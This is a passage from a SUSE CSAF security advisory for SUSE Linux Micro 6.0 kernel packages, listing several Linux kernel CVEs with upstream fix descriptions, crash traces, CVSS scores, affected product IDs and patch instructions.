"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71088",
"url": "https://www.suse.com/security/cve/CVE-2025-71088"
},
{
"category": "external",
"summary": "SUSE Bug 1256630 for CVE-2025-71088",
"url": "https://bugzilla.suse.com/1256630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71088"
},
{
"cve": "CVE-2025-71089",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71089"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niommu: disable SVA when CONFIG_X86 is set\n\nPatch series \"Fix stale IOTLB entries for kernel address space\", v7.\n\nThis proposes a fix for a security vulnerability related to IOMMU Shared\nVirtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel\npage table entries. When a kernel page table page is freed and\nreallocated for another purpose, the IOMMU might still hold stale,\nincorrect entries. This can be exploited to cause a use-after-free or\nwrite-after-free condition, potentially leading to privilege escalation or\ndata corruption.\n\nThis solution introduces a deferred freeing mechanism for kernel page\ntable pages, which provides a safe window to notify the IOMMU to\ninvalidate its caches before the page is reused.\n\n\nThis patch (of 8):\n\nIn the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware\nshares and walks the CPU\u0027s page tables. The x86 architecture maps the\nkernel\u0027s virtual address space into the upper portion of every process\u0027s\npage table. Consequently, in an SVA context, the IOMMU hardware can walk\nand cache kernel page table entries.\n\nThe Linux kernel currently lacks a notification mechanism for kernel page\ntable changes, specifically when page table pages are freed and reused. \nThe IOMMU driver is only notified of changes to user virtual address\nmappings. This can cause the IOMMU\u0027s internal caches to retain stale\nentries for kernel VA.\n\nUse-After-Free (UAF) and Write-After-Free (WAF) conditions arise when\nkernel page table pages are freed and later reallocated. The IOMMU could\nmisinterpret the new data as valid page table entries. The IOMMU might\nthen walk into attacker-controlled memory, leading to arbitrary physical\nmemory DMA access or privilege escalation. This is also a\nWrite-After-Free issue, as the IOMMU will potentially continue to write\nAccessed and Dirty bits to the freed memory while attempting to walk the\nstale page tables.\n\nCurrently, SVA contexts are unprivileged and cannot access kernel\nmappings. However, the IOMMU will still walk kernel-only page tables all\nthe way down to the leaf entries, where it realizes the mapping is for the\nkernel and errors out. This means the IOMMU still caches these\nintermediate page table entries, making the described vulnerability a real\nconcern.\n\nDisable SVA on x86 architecture until the IOMMU can receive notification\nto flush the paging cache before freeing the CPU kernel page table pages.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71089",
"url": "https://www.suse.com/security/cve/CVE-2025-71089"
},
{
"category": "external",
"summary": "SUSE Bug 1256612 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256612"
},
{
"category": "external",
"summary": "SUSE Bug 1256615 for CVE-2025-71089",
"url": "https://bugzilla.suse.com/1256615"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-71089"
},
{
"cve": "CVE-2025-71091",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71091"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix check for port enabled in team_queue_override_port_prio_changed()\n\nThere has been a syzkaller bug reported recently with the following\ntrace:\n\nlist_del corruption, ffff888058bea080-\u003eprev is LIST_POISON2 (dead000000000122)\n------------[ cut here ]------------\nkernel BUG at lib/list_debug.c:59!\nOops: invalid opcode: 0000 [#1] SMP KASAN NOPTI\nCPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full)\nHardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014\nRIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59\nCode: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 \u003c0f\u003e 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff\nRSP: 0018:ffffc9000d49f370 EFLAGS: 00010286\nRAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000\nRDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005\nRBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000\nR10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230\nR13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480\nFS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0\nCall Trace:\n \u003cTASK\u003e\n __list_del_entry_valid include/linux/list.h:132 [inline]\n __list_del_entry include/linux/list.h:223 [inline]\n list_del_rcu include/linux/rculist.h:178 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline]\n __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline]\n team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline]\n team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534\n team_option_set drivers/net/team/team_core.c:376 [inline]\n team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653\n genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115\n genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline]\n genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210\n netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552\n genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219\n netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline]\n netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346\n netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896\n sock_sendmsg_nosec net/socket.c:727 [inline]\n __sock_sendmsg net/socket.c:742 [inline]\n ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630\n ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684\n __sys_sendmsg+0x16d/0x220 net/socket.c:2716\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nThe problem is in this flow:\n1) Port is enabled, queue_id != 0, in qom_list\n2) Port gets disabled\n -\u003e team_port_disable()\n -\u003e team_queue_override_port_del()\n -\u003e del (removed from list)\n3) Port is disabled, queue_id != 0, not in any list\n4) Priority changes\n -\u003e team_queue_override_port_prio_changed()\n -\u003e checks: port disabled \u0026\u0026 queue_id != 0\n -\u003e calls del - hits the BUG as it is removed already\n\nTo fix this, change the check in team_queue_override_port_prio_changed()\nso it returns early if port is not enabled.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71091",
"url": "https://www.suse.com/security/cve/CVE-2025-71091"
},
{
"category": "external",
"summary": "SUSE Bug 1256773 for CVE-2025-71091",
"url": "https://bugzilla.suse.com/1256773"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71091"
},
{
"cve": "CVE-2025-71093",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71093"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ne1000: fix OOB in e1000_tbi_should_accept()\n\nIn e1000_tbi_should_accept() we read the last byte of the frame via\n\u0027data[length - 1]\u0027 to evaluate the TBI workaround. If the descriptor-\nreported length is zero or larger than the actual RX buffer size, this\nread goes out of bounds and can hit unrelated slab objects. The issue\nis observed from the NAPI receive path (e1000_clean_rx_irq):\n\n==================================================================\nBUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790\nRead of size 1 at addr ffff888014114e54 by task sshd/363\n\nCPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014\nCall Trace:\n \u003cIRQ\u003e\n dump_stack_lvl+0x5a/0x74\n print_address_description+0x7b/0x440\n print_report+0x101/0x200\n kasan_report+0xc1/0xf0\n e1000_tbi_should_accept+0x610/0x790\n e1000_clean_rx_irq+0xa8c/0x1110\n e1000_clean+0xde2/0x3c10\n __napi_poll+0x98/0x380\n net_rx_action+0x491/0xa20\n __do_softirq+0x2c9/0x61d\n do_softirq+0xd1/0x120\n \u003c/IRQ\u003e\n \u003cTASK\u003e\n __local_bh_enable_ip+0xfe/0x130\n ip_finish_output2+0x7d5/0xb00\n __ip_queue_xmit+0xe24/0x1ab0\n __tcp_transmit_skb+0x1bcb/0x3340\n tcp_write_xmit+0x175d/0x6bd0\n __tcp_push_pending_frames+0x7b/0x280\n tcp_sendmsg_locked+0x2e4f/0x32d0\n tcp_sendmsg+0x24/0x40\n sock_write_iter+0x322/0x430\n vfs_write+0x56c/0xa60\n ksys_write+0xd1/0x190\n do_syscall_64+0x43/0x90\n entry_SYSCALL_64_after_hwframe+0x44/0xae\nRIP: 0033:0x7f511b476b10\nCode: 73 01 c3 48 8b 0d 88 d3 2b 00 f7 d8 64 89 01 48 83 c8 ff c3 66 0f 1f 44 00 00 83 3d f9 2b 2c 00 00 75 10 b8 01 00 00 00 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 8e 9b 01 00 48 89 04 24\nRSP: 002b:00007ffc9211d4e8 EFLAGS: 00000246 ORIG_RAX: 0000000000000001\nRAX: ffffffffffffffda RBX: 0000000000004024 RCX: 00007f511b476b10\nRDX: 0000000000004024 RSI: 0000559a9385962c RDI: 0000000000000003\nRBP: 0000559a9383a400 R08: fffffffffffffff0 R09: 0000000000004f00\nR10: 0000000000000070 R11: 0000000000000246 R12: 0000000000000000\nR13: 00007ffc9211d57f R14: 0000559a9347bde7 R15: 0000000000000003\n \u003c/TASK\u003e\nAllocated by task 1:\n __kasan_krealloc+0x131/0x1c0\n krealloc+0x90/0xc0\n add_sysfs_param+0xcb/0x8a0\n kernel_add_sysfs_param+0x81/0xd4\n param_sysfs_builtin+0x138/0x1a6\n param_sysfs_init+0x57/0x5b\n do_one_initcall+0x104/0x250\n do_initcall_level+0x102/0x132\n do_initcalls+0x46/0x74\n kernel_init_freeable+0x28f/0x393\n kernel_init+0x14/0x1a0\n ret_from_fork+0x22/0x30\nThe buggy address belongs to the object at ffff888014114000\n which belongs to the cache kmalloc-2k of size 2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-71093"
},
{
"cve": "CVE-2025-71094",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71094"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: asix: validate PHY address before use\n\nThe ASIX driver reads the PHY address from the USB device via\nasix_read_phy_addr(). A malicious or faulty device can return an\ninvalid address (\u003e= PHY_MAX_ADDR), which causes a warning in\nmdiobus_get_phy():\n\n addr 207 out of range\n WARNING: drivers/net/phy/mdio_bus.c:76\n\nValidate the PHY address in asix_read_phy_addr() and remove the\nnow-redundant check in ax88172a.c.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71094",
"url": "https://www.suse.com/security/cve/CVE-2025-71094"
},
{
"category": "external",
"summary": "SUSE Bug 1256597 for CVE-2025-71094",
"url": "https://bugzilla.suse.com/1256597"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "low"
}
],
"title": "CVE-2025-71094"
},
{
"cve": "CVE-2025-71095",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71095"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: stmmac: fix the crash issue for zero copy XDP_TX action\n\nThere is a crash issue when running zero copy XDP_TX action, the crash\nlog is shown below.\n\n[ 216.122464] Unable to handle kernel paging request at virtual address fffeffff80000000\n[ 216.187524] Internal error: Oops: 0000000096000144 [#1] SMP\n[ 216.301694] Call trace:\n[ 216.304130] dcache_clean_poc+0x20/0x38 (P)\n[ 216.308308] __dma_sync_single_for_device+0x1bc/0x1e0\n[ 216.313351] stmmac_xdp_xmit_xdpf+0x354/0x400\n[ 216.317701] __stmmac_xdp_run_prog+0x164/0x368\n[ 216.322139] stmmac_napi_poll_rxtx+0xba8/0xf00\n[ 216.326576] __napi_poll+0x40/0x218\n[ 216.408054] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n\nFor XDP_TX action, the xdp_buff is converted to xdp_frame by\nxdp_convert_buff_to_frame(). The memory type of the resulting xdp_frame\ndepends on the memory type of the xdp_buff. For page pool based xdp_buff\nit produces xdp_frame with memory type MEM_TYPE_PAGE_POOL. For zero copy\nXSK pool based xdp_buff it produces xdp_frame with memory type\nMEM_TYPE_PAGE_ORDER0. However, stmmac_xdp_xmit_back() does not check the\nmemory type and always uses the page pool type, this leads to invalid\nmappings and causes the crash. Therefore, check the xdp_buff memory type\nin stmmac_xdp_xmit_back() to fix this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
